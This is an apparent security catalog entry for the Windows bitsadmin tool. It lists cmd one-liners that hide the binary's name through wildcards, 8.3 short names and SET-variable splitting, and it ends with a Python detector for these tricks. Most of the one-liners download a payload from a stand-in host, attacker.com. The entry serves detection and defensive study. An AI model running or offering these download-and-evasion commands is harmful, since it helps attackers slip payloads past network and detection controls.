bitsadmin

Windows CMD download T1197

Background Intelligent Transfer Service admin tool. Can download or upload files using BITS jobs, bypassing some network controls.

Binary Paths

  • C:\Windows\System32\bitsadmin.exe

Glob Patterns

Pattern
  Notes

for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  Star matches 'admin' after 'bits'

for /f %i in ('where b*admin.exe') do %i
  Star replaces 'its'

for /f %i in ('where bitsad?in.exe') do %i
  Single char wildcard replaces 'm'

for /f %i in ('dir /b C:\Windows\System32\bits*.exe') do %i
  dir /b with glob pattern

forfiles /p C:\Windows\System32 /m bits*.exe /c "@file /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe"
  forfiles * mask finds bitsadmin.exe — @file expands to matched filename for execution

C:\Windows\System32\BITSAD~1.EXE /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  8.3 SFN — requires NtfsDisable8dot3NameCreation=0; BITSAD~1 is the auto-generated short name for bitsadmin.exe

for %i in (C:\Windows\System32\bits*.exe) do @%i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  Native CMD for loop with filesystem glob — expands bits*.exe directly in System32 without where.exe

for /f %i in ('where /r C:\Windows bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  Recursive where search across Windows tree — finds bitsadmin.exe regardless of System32 vs SysWOW64 location

set a=bits& set b=admin& call %a%%b% /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  Binary name split across two SET variables — CALL resolves %a%%b%=bitsadmin; name never appears as literal string

cmd /c for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
  cmd /c wrapper adds an extra process layer — glob still resolves via where; parent process becomes cmd.exe not the caller

Platform Notes

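CMD does not expand wildcards in the command name itself, so glob evasion requires a construct that resolves the pattern first, typically the for /f + where pattern. BITS jobs persist across reboots by default, making bitsadmin useful for persistence too.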

8.3 SFN note: Short filename paths (BITSAD~1.EXE) only exist when 8.3 name generation is enabled (NtfsDisable8dot3NameCreation=0 in the registry).
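
For detection, a rule keyed on the literal string "bitsadmin" misses every pattern above. The following is an added example, not part of the original catalog entry: a Python classifier for process command lines that resolves wildcard tokens, the 8.3 alias and same-line SET concatenation back to bitsadmin.exe. The function names, reason labels and sample lines (with the placeholder host example.test) are constructed for illustration.

```python
import fnmatch
import re

TARGET = "bitsadmin.exe"
BITS_ARGS = re.compile(r"/transfer\b.*?/download\b", re.I)  # argument shape used in the patterns above
WILDCARD = re.compile(r"[^\s'\"()]*[*?][^\s'\"()]*")        # any token containing * or ?
SHORT_NAME = re.compile(r"\bBITSAD~\d\.EXE\b", re.I)        # 8.3 alias of bitsadmin.exe
SET_VAR = re.compile(r"\bset\s+(\w+)=([^&\s]*)", re.I)      # set name=value, value ends at & or space
VAR_REF = re.compile(r"%(\w+)%")

def expand_set_vars(cmdline):
    """Substitute %var% references using SET assignments found on the same line."""
    env = {name.lower(): value for name, value in SET_VAR.findall(cmdline)}
    return VAR_REF.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), cmdline)

def classify(cmdline):
    """Return the set of reasons this command line refers to bitsadmin.exe."""
    reasons = set()
    if "bitsadmin" in cmdline.lower():
        reasons.add("literal")
    elif "bitsadmin" in expand_set_vars(cmdline).lower():
        reasons.add("set-concat")
    if SHORT_NAME.search(cmdline):
        reasons.add("8.3-short-name")
    for token in WILDCARD.findall(cmdline):
        # Compare only the filename part of the token against the real binary name.
        pattern = re.split(r"[\\/]", token)[-1].lower()
        if pattern and fnmatch.fnmatchcase(TARGET, pattern):
            reasons.add("glob")
    # A broad glob such as *.exe also matches, so the transfer arguments raise confidence.
    if reasons and BITS_ARGS.search(cmdline):
        reasons.add("bits-download-args")
    return reasons

# Constructed sample command lines modelled on the patterns in this entry.
SAMPLES = [
    r"for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://example.test/p.exe C:\p.exe",
    r"C:\Windows\System32\BITSAD~1.EXE /transfer job /download /priority normal http://example.test/p.exe C:\p.exe",
    r"set a=bits& set b=admin& call %a%%b% /transfer job /download /priority normal http://example.test/p.exe C:\p.exe",
    r"dir /b C:\Users\*.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(classify(line)), "<-", line)
```

Run it over command-line fields from process-creation telemetry; a "glob" hit without "bits-download-args" needs triage because generic masks match many binaries.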
